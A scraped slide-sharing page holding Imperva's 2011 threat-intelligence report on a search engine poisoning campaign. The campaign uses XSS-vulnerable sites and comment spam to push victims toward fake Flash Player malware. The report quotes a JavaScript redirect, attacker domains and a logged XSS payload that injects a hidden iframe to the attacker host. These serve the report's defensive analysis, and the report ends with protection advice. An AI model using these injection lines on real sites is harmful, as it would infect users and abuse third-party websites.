Combat Payment Card Attacks with WAF and Threat IntelligenceCombat Payment Card Attacks with WAF and Threat Intelligence
Combat Payment Card Attacks with WAF and Threat Intelligence
 
HTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing Exponentially
HTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing ExponentiallyHTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing Exponentially
HTTP/2: Faster Doesn't Mean Safer, Attack Surface Growing Exponentially
 
Get Going With Your GDPR Plan
Get Going With Your GDPR PlanGet Going With Your GDPR Plan
Get Going With Your GDPR Plan
 
Cyber Criminal's Path To Your Data
Cyber Criminal's Path To Your DataCyber Criminal's Path To Your Data
Cyber Criminal's Path To Your Data
 
Combat Today's Threats With A Single Platform For App and Data Security
Combat Today's Threats With A Single Platform For App and Data SecurityCombat Today's Threats With A Single Platform For App and Data Security
Combat Today's Threats With A Single Platform For App and Data Security
 
The State of Application Security: Hackers On Steroids
The State of Application Security: Hackers On SteroidsThe State of Application Security: Hackers On Steroids
The State of Application Security: Hackers On Steroids
 

Recently uploaded

Visualising and forecasting stocks using Dash
Visualising and forecasting stocks using DashVisualising and forecasting stocks using Dash
Visualising and forecasting stocks using Dashnarutouzumaki53779
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPathCommunity
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Scott Andery
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality AssuranceInflectra
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Farhan Tariq
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsNathaniel Shimoni
 
A Framework for Development in the AI Age
A Framework for Development in the AI AgeA Framework for Development in the AI Age
A Framework for Development in the AI AgeCprime
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfMounikaPolabathina
 

Recently uploaded (20)

Visualising and forecasting stocks using Dash
Visualising and forecasting stocks using DashVisualising and forecasting stocks using Dash
Visualising and forecasting stocks using Dash
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to Hero
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directions
 
A Framework for Development in the AI Age
A Framework for Development in the AI AgeA Framework for Development in the AI Age
A Framework for Development in the AI Age
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 

Search Engine Poisoning

  • 1. June 2011 Hacker Intelligence Initiative, Monthly Trend Report #2 Hacker Intelligence Summary Report – Search Engine Poisoning (SEP) In this second report from Imperva’s Hacker Intelligence Initiative (HII), we describe a Search Engine Poisoning (SEP) campaign from start to finish. SEP abuses the ranking algorithms of search engines to promote an attacker-controlled website that contains malware. Imperva’s Application Defense Center (ADC) has witnessed these types of automated attack campaigns which cause search engines to return high-ranking Web pages infected with malicious code that references an attacker-controlled website. Imperva’s ADC HII probes were able to detect and track a SEP attack campaign from start to end. The observed attack was extremely successful, and continued to run for at least 151 months without any apparent counter-measures employed by search engines. The prevalence and longevity of this attack indicates search engines need to improve their ability to qualify search results as potentially harmful. In this report, we will follow the journey of this SEP operation, and propose potential solutions that leading search engines such as Google, Bing and Yahoo can employ to address the problem. SEP in a Nutshell Search Engine Poisoning attacks manipulate search engines to display search results that contain references to malware- delivering websites. There are a multitude of methods to perform SEP, including taking control of popular websites, using the search engines’ “sponsored” links to reference malicious sites and injecting HTML code. In this report, we focus on the latter method where the returned search results contain references to sites infected with Cross Site Scripting (XSS). The infected Web pages redirect unsuspecting users to malicious sites. When unsuspecting victims follow one of these references, their computers become infected with malware. This technique is of particular importance since it does not require the attacker to take over, or break into any of the servers involved in the scheme. A Journey through Search Engine Poisoning Search Engine Poisoning is comprised of the following steps: 1. The attacker sets up a server that delivers malware upon request. The malware can be delivered in different ways, such as via an HTML page that exploits a browser vulnerability (aka “drive-by-download”), a “Scareware” scheme, or in any other variety of methods. 2. The attacker obtains a list of URLs vulnerable to Cross Site Scripting (XSS). In order to have an impact, these URLs should be taken from domains that rank high in search engines. The attacker usually obtains this list by an activity called “Google Hacking” – looking for specially crafted search terms in search engines that reveal the potential existence of specific vulnerabilities. 3. Using this list, the attacker creates a huge number of specially-crafted URLs that are based on the vulnerable ones and include the target keywords and a script that interacts with malware delivery server. 4. The attacker obtains a list of applications that support simple user content generation. These could be forums, pages that take user comments or applications that accommodate user reviews. The attacker then floods the content accepting applications with the variety of specially crafted URLs. 5. Popular search engine bots that scan the entire Web pick up the specially crafted URLs and follow them in order to index their content. As a consequence, the target keywords become associated with the specially crafted URLs. Since the attacker picked up URLs of high ranking domains to begin with, and due to the large amount of references into these URLS, the poisoned results get high ranking for the target keywords. 6. An unsuspecting user searching for one of the target terms clicks on one of these URLS and as a consequence become infected with malware. 1 The attack we detail in this document was identified as early as December 2009 in: http://research.zscaler.com/2009/12/xss-embedded-iframes.html. In that description, similar attacker servers were used, and the offered malware described itself to the user as an AntiVirus installer and was offered from the innocent-looking download site “windows-antivirus4.com”.
  • 2. Hacker Intelligence Initiative, Monthly Trend Report Attacker 1. Hacker creates infected website » 2. Finding bait: Hacker searches websites for XSS and creates a list of vulnerable websites to exploit. » 3. Baiting the trap: Once having a list of vulnerable websites, the attacker creates a huge number of specially crafted URLs that are like hooks. The hacker baits these URLs with popular keywords. In addition, the hacker adds software that interacts » 4. Chumming the waters: The attacker obtains a list of websites where users generate content. These could be forums, pages that take user comments or applications that accommodate user reviews. The attacker then floods the content accepting with malware that alerts the attacker when applications with the variety of specially someone “bites”. crafted URLs. Search Engine 5. Search engine archives infected Websites, returning these as top results for the associated search terms. Victim 6. Victim searches for popular search term. » 7. Victim clicks on a high-ranking link returned from the search engine. The link redirects the user to the attacker controlled server. Report #2, June 2011 2
  • 3. Hacker Intelligence Initiative, Monthly Trend Report SEP – Observed Example Here we will detail an example of a SEP campaign observed in the wild: 1. The attacker’s servers were registered at Hostgator.com, based in Houston, Texas, USA. The attacker used multiple domain names such as: a15h.in, ask5.eu, d87.eu, and r0l.eu. These servers redirect the user to actual sources of porn pictures and malware. Server “ask5.eu” for example on January 2010 returned a page that contains the following JavaScript code: <script>parent.location.replace(“http://celebs01.100webspace.net/view.php?q= elizabeth+hurley+bikini”);</script> In this case, the porn site http://celebs01.100webspace.net/view.php?q=elizabeth+hurley+bikini shows a fake announcement that encourages the user to download and install an innocent-looking “Adobe Flash Player”: When the download link is clicked it offers to download malware from getfastload.com: On March 2011, the same observed attack had slightly different details: the explicit porn content was downloaded from free-celebs-nude.co.cc. The link to the malware was also upgraded to look like recent real Adobe Flash Player links, and the download location for the malware was changed to the more innocent-looking update9.adobe-flash-player. from-ct.com: Report #2, June 2011 3
  • 4. Hacker Intelligence Initiative, Monthly Trend Report 2. The attacker injected comment-spam in sites like http://www.jhbs.jp/fantasy/fantasy.cgi: In this example, the content refers to a XSS-vulnerable website http://www.vads.ac.uk/- a website which Google, in this case, graded with the high “page rank” of 6. In addition, the attacker inserted the popular search terms “PUSSY CAT DOLLS DOLL DOMINATION” as well as a hidden link (via an iFrame) to the attacker-controlled server, ask5.eu. 3. Popular search engine bots (such as those run by Google and Yahoo) follow the link and index the URL (together with the exploit code) as related to the chosen search terms. For example, the logs of attacked sites dating from December 2010 to March 2011 showed that both the Yahoo crawler and the Google bot followed the hidden malicious iFrame link. Occurred: 13/3/11 10:33:07 PM Source IP: 67.195.111.253 (b3091319.crawl.yahoo.net = Yahoo crawler) Host: www.[monitored site].com Http Parameters: aSearchPhrase : NUDE PICS OF ROSARIO DAWSON</title> <iframe src=//ask5.eu> The search engine associated the terms used in the query with the reference to the XSS-vulnerable page, including the hidden embedded redirection directive to the attacker’s site. Since the search terms appear both in the URL and in the content, in addition to the high-ranking of the abused site (in this case, a Google “page rank” of 7 was the observed case), this specific result is given a high ranking. This in turns leads the poisoned result to appear among the first search results for those search terms. 4. Search engines are “poisoned” with the attacker’s crafted references. For example, search results for “barbie bridges nude pictures” shows that the attacker-promoted links appear in the fourth and sixth places. Report #2, June 2011 4
  • 5. Hacker Intelligence Initiative, Monthly Trend Report SEP – Protection from Attacks SEP is an extremely popular method used by hackers to widely spread their malware. As we have shown in this report, attackers exploit XSS to take advantage of the role of third-party websites as mediators between search engines and the attacker’s malicious site. Recommendations to the Web Administrator: Abusing a Website in the manner described in this document, may lead to brand damage, loss of customer base and potential visitors. Moreover it has a clear negative impact on the sites accessibility through search engines including decreased ranking, marking references as harmful and even altogether removal from the search index. Ultimately, this leads to devastating economic implications. Protecting the Web application against XSS attacks will prevent these sites from being abused as the attacker’s conduit for a SEP campaign. Recommendations to Search Engines: Protection of users from malicious references returned as search results is also a responsibility of search engines. Current solutions that warn the user of malicious sites lack accuracy and precision and many malicious sites continue to be returned un-flagged. However, these solutions may be enhanced by studying the footprints of a SEP via XSS. This will allow more accurate and timely notifications as well as prudent indexing. Hacker Intelligence Initiative Overview The Imperva Hacker Intelligence Initiative goes inside the cyber-underground and provides analysis of the trending hacking techniques and interesting attack campaigns from the past month. A part of Imperva’s Application Defense Center research arm, the Hacker Intelligence Initiative (HII), is focused on tracking the latest trends in attacks, Web application security and cyber-crime business models with the goal of improving security controls and risk management processes. Imperva Tel: +1-650-345-9000 3400 Bridge Parkway, Suite 200 Fax: +1-650-345-9004 Redwood City, CA 94065 www.imperva.com © Copyright 2011, Imperva All rights reserved. Imperva, SecureSphere, and “Protecting the Data That Drives Business” are registered trademarks of Imperva. All other brand or product names are trademarks or registered trademarks of their respective holders. #HII-JUNE-2011-0611rev1